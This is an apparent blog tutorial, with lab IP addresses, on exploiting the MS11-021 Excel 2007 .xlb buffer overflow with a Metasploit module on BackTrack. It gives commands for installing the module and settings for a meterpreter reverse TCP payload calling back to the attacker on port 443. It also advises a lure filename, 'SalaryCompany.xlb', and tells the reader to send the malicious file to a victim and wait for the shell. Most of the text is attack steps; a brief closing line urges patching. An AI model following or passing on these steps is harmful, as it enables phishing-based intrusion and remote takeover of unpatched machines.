Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP3
Tested Vulnerable Application : Microsoft Office 2007
Exploit Credit : thanks to sinn3r c for the exploit
Long time no write 🙂 today I will write down about ms11_021 vulnerability found in Microsoft Excel 2007. This vulnerability actually found over 2 month ago and now already patched, but I think there's still many people didn't recognize about updating their system especially about the application. Before I wrote this tutorial, I'm asking some of my friend about their Microsoft Office update and they just say that "it's only for writing document" or "it's only for accounting and wrote some formula so it's enough for me without an update" 🙂 .
Actually an attack into your system can be happen in various ways and even unusual ways and sometimes involving your emotion inside it…complicated isn't it??
Okay let's start the tutorial :
1. ms11_021 exploit (download link)
2. CVE-2011-1276 xlb toolbar (Download from mediafire)
Attacker IP Address : 192.168.8.93
Victim IP Address : 192.168.8.94
1. Download the required exploit + file format from the link above.
Copy the ms11_021_xlb_bof.rb to /pentest/exploits/framework/modules/exploits/windows/fileformat/ folder
cp ms11_021_xlb_bof.rb /pentest/exploits/framework/modules/exploits/windows/fileformat/
Copy the CVE-2011-1276.xlb to /opt/framework/msf3/data/exploits/ folder
cp CVE-2011-1276.xlb /opt/framework/msf3/data/exploits/
2. Run your terminal (CTRL + ALT + T) and type msfconsole to start metasploit console and then use the exploit we've just added in step 1.
In the picture above I'm using meterpreter reverse tcp as my payload when the attack was successfully performed.
3. This exploit have a switch that need to be configured. To view the available switch just run show options command from your metasploit console. In this picture above I'm just set up switch that needed to perform the attack.
set filename SalaryCompany.xlb --> Eye catching enough? set lhost 192.168.8.93 --> local attacker IP set lport 443 --> local port to handle incoming connection from victim set target 0 --> set the target machine to windows XP that use ms office 2007 exploit --> generate the malicious file /root/.msf4/local/SalaryCompany.xlb --> Location of malicious file ready to send to victim
4. Before sending the malicious Microsoft office excel malicious file to victim, we need to set up listener in our computer to receive incoming connection when attack successfully launched.
5. When all configurations seems great, now it's time to send the malicious file to victim and start the listener.
As soon as the victim open our malicious Microsoft office excel file we've got their machine.
1. Update your Microsoft Office software
2. Do not think that updating an application / software is a troublesome or someday you will be the victim (in this tutorial) 😛
Hope it's useful 🙂